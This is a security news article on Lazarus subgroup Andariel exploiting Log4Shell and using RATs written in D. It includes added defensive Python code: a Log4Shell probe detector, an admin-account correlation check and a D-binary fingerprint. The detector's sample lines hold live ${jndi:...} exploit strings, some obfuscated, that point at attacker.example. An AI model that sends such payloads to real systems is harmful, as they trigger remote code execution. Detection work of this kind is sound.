Lazarus Group Is Still Juicing Log4Shell, Using RATs Written in 'D'

The infamous vulnerability may be on the older side at this point, but North Korea's primo APT Lazarus is creating new, unique malware around it at a remarkable clip.


North Korean hackers are still exploiting Log4Shell around the world. And lately, they're using that access to attack organizations with one of three new remote access Trojans (RATs) written in the rarely seen "D" (aka dlang) programming language.

The group behind this scheme, "Andariel" (aka Onyx Sleet, Plutonium), is one of many entities within Lazarus, the umbrella collective of North Korean state-backed hacking groups. Andariel specializes in obtaining initial access and persistence for longer-term espionage campaigns in service of the Kim Jong Un regime. In some cases, though, it has carried out its own ransomware attacks against healthcare organizations.

Since March, Cisco Talos has observed three Andariel attacks of note using Log4Shell: against an agriculture organization in South America, a European manufacturing company, and an American subsidiary of a Korean physical security company.

In each of these cases, the group has deployed novel malware written in D, a little-used C-family language designed as a successor to C++, with the intent of throwing off detection and analysis. As Cisco Talos head of outreach Nick Biasini emphasizes, this is what makes North Korea's hackers most distinctive.

"For a long time tooling has been collapsing — everybody kind of uses the same tool sets to obscure attribution," he says. "Lazarus has gone the exact opposite direction. They go crazy with writing bespoke malware."

Log4Shell: An Initial-Access Gift That Keeps Giving

Andariel's recent attacks began by exploiting publicly exposed VMware Horizon servers that were still vulnerable to Log4Shell, the now two-year-old vulnerability in the Apache Log4j logging library.

The flaw (CVE-2021-44228) carries the maximum CVSS score of 10.0. It lets anyone who can get a crafted lookup string such as ${jndi:ldap://...} into a field the application logs make Log4j fetch and run attacker-supplied code. Because the Log4j Java library is embedded in so much software, researchers estimated when it was first disclosed that affected systems numbered in the hundreds of millions.
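The lookup string above is the whole exploit surface, and attackers routinely split the word "jndi" across nested lookups or URL-encode it to slip past naive string matching. The following detector is an added example written for this article, not code from Cisco Talos or the reporter; the log lines and the host attacker.example are constructed. It URL-decodes each line, collapses the trivial nested-lookup forms (${lower:x}, ${upper:x}, ${anything:-x}) from the inside out, and only then looks for a JNDI lookup:

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the article or from Cisco Talos).
# attacker.example is a placeholder host; the last four lines carry a Log4Shell
# probe in increasingly obfuscated forms.
SAMPLE_LINES = [
    'GET /portal/login HTTP/1.1 "Mozilla/5.0"',
    'GET / HTTP/1.1 "${jndi:ldap://attacker.example:1389/a}"',
    'GET /?q=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1 "-"',
    'GET / HTTP/1.1 "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/x}"',
    'GET / HTTP/1.1 "${${env:NOPE:-j}ndi:dns://attacker.example/x}"',
]

# An innermost ${...} lookup: no nested "$", "{" or "}" inside.
_INNER = re.compile(r'\$\{([^${}]*)\}')
# A JNDI lookup naming one of the protocols Log4j's JNDI plugin can dispatch on.
_JNDI = re.compile(r'\$\{\s*jndi\s*:\s*(?:ldaps?|rmi|dns|iiop|corba|nds|http)\s*:', re.I)


def _resolve(content: str):
    """Return the literal a nested lookup evaluates to, or None if it is not
    one of the trivial forms attackers use to split the word 'jndi'."""
    if ':-' in content:                      # ${anything:key:-default} -> default
        return content.rsplit(':-', 1)[1]
    head, sep, rest = content.partition(':')
    if sep and head.lower() in ('lower', 'upper'):
        return rest                          # ${lower:j} -> j (case fixed later)
    return None


def normalize(line: str) -> str:
    """URL-decode (bounded, in case of double encoding) and collapse nested
    lookups from the inside out until the string stops changing."""
    for _ in range(3):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    for _ in range(32):                      # bound the work on hostile input
        changed = False

        def sub(m):
            nonlocal changed
            literal = _resolve(m.group(1))
            if literal is None:
                return m.group(0)            # leave unresolvable lookups intact
            changed = True
            return literal

        line = _INNER.sub(sub, line)
        if not changed:
            break
    return line.lower()


def is_log4shell_probe(line: str) -> bool:
    return _JNDI.search(normalize(line)) is not None


def scan(lines):
    """Indexes of the lines that contain a JNDI lookup after normalization."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for i in scan(SAMPLE_LINES):
        print(f"line {i}: {normalize(SAMPLE_LINES[i])}")
```

Matching on the normalized form rather than the raw line is the point: the three obfuscated probes contain no literal "jndi" until the nested lookups are collapsed. Run this over the User-Agent, X-Forwarded-For and any other header a Java application might log, not just the request path.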

Two years on and multiple “the sky is falling” headlines later, Veracode reported last week that more than a third (38%) of all in-use applications are still using vulnerable versions of Log4j.

"It's possible that organizations have software that they don't even realize was affected by Log4j — it was so widely used that the cascading impacts are still really being felt today," Biasini says with some sympathy, and a caveat. "That being said, patching is still something that organizations struggle with."

Andariel's Latest Cyberattacks

In the three recent campaigns that the researchers highlighted, Log4Shell was used to achieve initial access. After the intrusion, the attackers established persistence by dropping "HazyLoad," a custom proxy tool. Next, they created new local user accounts with administrative privileges on the compromised host, then used those accounts to download credential-dumping software such as Mimikatz and, ultimately, their custom malware tools.
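The account-creation step leaves a reliable trace in the Windows Security log regardless of which malware follows it. The correlation below is an added example, not code or telemetry from the Talos report; it assumes the standard event IDs 4720 (a user account was created) and 4732 (a member was added to a security-enabled local group) and the well-known SID of the local Administrators group, and the event records are constructed and simplified:

```python
from datetime import datetime, timedelta

ADMINISTRATORS_SID = "S-1-5-32-544"   # well-known SID of the local Administrators group
USERS_SID = "S-1-5-32-545"            # well-known SID of the local Users group

# Constructed, simplified Security-log records (assumption: event IDs 4720
# "user account created" and 4732 "member added to a security-enabled local
# group"; field names are shortened from the XML event schema).
# Not telemetry from the intrusions the article describes.
EVENTS = [
    {"ts": "2023-12-01T10:02:11", "id": 4720, "host": "horizon-01", "subject": "SYSTEM",
     "target_user": "svc_backup", "target_sid": "S-1-5-21-1-2-3-1104"},
    {"ts": "2023-12-01T10:02:40", "id": 4732, "host": "horizon-01", "subject": "SYSTEM",
     "member_sid": "S-1-5-21-1-2-3-1104", "group_sid": ADMINISTRATORS_SID},
    # benign: helpdesk creates a normal user and adds it to Users
    {"ts": "2023-12-01T14:30:00", "id": 4720, "host": "fs-02", "subject": "helpdesk",
     "target_user": "j.doe", "target_sid": "S-1-5-21-1-2-3-1200"},
    {"ts": "2023-12-01T14:31:00", "id": 4732, "host": "fs-02", "subject": "helpdesk",
     "member_sid": "S-1-5-21-1-2-3-1200", "group_sid": USERS_SID},
    # benign: a long-standing account is added to Administrators with no 4720
    {"ts": "2023-12-02T09:00:00", "id": 4732, "host": "horizon-01", "subject": "itadmin",
     "member_sid": "S-1-5-21-1-2-3-500", "group_sid": ADMINISTRATORS_SID},
]


def find_new_local_admins(events, window=timedelta(minutes=10)):
    """Correlate account creation (4720) with a later addition of the same SID
    to Administrators (4732) on the same host within `window`.  Keying on the
    SID rather than the account name survives renames."""
    created = {}   # (host, sid) -> (creation time, account name)
    hits = []
    for e in sorted(events, key=lambda e: e["ts"]):
        t = datetime.fromisoformat(e["ts"])
        if e["id"] == 4720:
            created[(e["host"], e["target_sid"])] = (t, e["target_user"])
        elif e["id"] == 4732 and e["group_sid"] == ADMINISTRATORS_SID:
            key = (e["host"], e["member_sid"])
            if key in created:
                t0, user = created[key]
                if timedelta(0) <= t - t0 <= window:
                    hits.append({"host": e["host"], "user": user, "by": e["subject"],
                                 "seconds_to_elevation": int((t - t0).total_seconds())})
    return hits


if __name__ == "__main__":
    for h in find_new_local_admins(EVENTS):
        print(h)
```

Only the first pair fires: a brand-new account elevated to Administrators within seconds, by a subject that is a service rather than a human operator. The same record tells you which process context did it, which is the thread to pull when the host is an Internet-facing Java application server.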

Andariel's current arsenal includes "NineRAT," a dropper-cum-backdoor that uses Telegram as its command-and-control (C2) base; "DLRAT," used for downloading additional malware and executing commands on infected hosts; and a downloader called "BottomLoader."

Though outwardly unexceptional, these new tools do stand out for being written in D, a 22-year-old language designed as a successor to C++ that is rarely seen in malware.

The Exceptional Range of DPRK Hackers

Some hackers achieve stealth with living-off-the-land (LotL) techniques. Some use code obfuscation, steganography, and more elaborate tricks. In contrast, North Korean hackers — more so than anyone else, it seems — resist detection and analysis by building custom malware in bulk, using old, unloved programming languages their adversaries aren't expecting.

"A lot of malware detection is either written for specific malware variants, or written in ways that detect more general characteristics of malware," Biasini explains. Novel malware, which the DPRK creates plenty of, defeats antivirus scans looking for specific signatures, and oddball languages like D add a further layer of difficulty for detection tooling and analysts tuned to the code patterns of more common compilers.
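The flip side is that a compiler and runtime leave fingerprints of their own, so a binary in an unusual language can be triaged by toolchain even before anyone reads its logic. The fingerprint below is an added example, not code from Cisco Talos or a rule used against the samples in the article; the markers are assumptions drawn from the DMD/LDC toolchains (D-style name mangling, the druntime entry symbols, and embedded druntime/Phobos module names), and the two byte blobs are constructed stand-ins for a D and a C binary:

```python
import re

# Heuristic markers the D toolchain leaves in a binary.  Assumptions from the
# DMD/LDC ABI, not anything stated in the article: D mangles symbols as "_D"
# followed by length-prefixed identifiers (e.g. _D5mymod4initFZv for
# void mymod.init()), druntime enters user code through _d_run_main / _Dmain,
# and TypeInfo and exception names embed module paths such as core.exception.
MARKERS = {
    "d_mangled_symbol": re.compile(rb"_D\d+[A-Za-z_]\w*"),
    "druntime_entry":   re.compile(rb"_d_run_main|_Dmain\b"),
    "druntime_module":  re.compile(
        rb"(?:core|std|rt)\.(?:runtime|exception|memory|thread|stdio|string|conv|dmain2)\b"),
}

# Constructed stand-ins for two small ELF images (header plus symbol-table
# fragments only), not real samples.
ELF_HEADER = b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8
D_BLOB = ELF_HEADER + (b"\x00_Dmain\x00_d_run_main\x00_D5mymod4initFZv\x00"
                       b"core.exception.AssertError\x00rt.dmain2\x00")
C_BLOB = ELF_HEADER + b"\x00main\x00__libc_start_main\x00printf\x00_DllMainCRTStartup\x00"


def d_markers(blob: bytes) -> dict:
    """Each marker category -> sorted unique matches found in the blob."""
    return {name: sorted({m.group(0).decode("ascii", "replace") for m in rx.finditer(blob)})
            for name, rx in MARKERS.items()}


def looks_like_dlang(blob: bytes, min_categories: int = 2) -> bool:
    """Require hits in at least two independent categories so that a single
    stray string does not fire on a C or C++ binary."""
    return sum(1 for hits in d_markers(blob).values() if hits) >= min_categories


if __name__ == "__main__":
    for label, blob in (("D", D_BLOB), ("C", C_BLOB)):
        print(label, looks_like_dlang(blob), d_markers(blob))
```

Note that _DllMainCRTStartup in the C blob does not trip the mangling pattern, because D mangling always puts a digit (the identifier length) right after the _D prefix. A stripped binary loses the symbol names but usually keeps the runtime's module strings, which is why the check spans more than one category rather than relying on any single marker.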

Lazarus proved as much with "QuiteRAT," its recently discovered tool built with Qt, a C++ framework for building graphical user interfaces. "By using these weird programming languages, they can potentially evade some of those detections. Maybe the endpoint detection won't flag that weird RAT that's written in dlang, but if they pulled a RAT that was written in C or C++, it'd get flagged immediately," Biasini says.

It's for this reason that Lazarus attacks demand just a bit of extra vigilance.

"It's going to take you a while to get your feet underneath you and understand how this works," Biasini cautions, "because logically it's all the same, but it just does it in a different format."

About the Author

Nate Nelson, Contributing Writer

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.
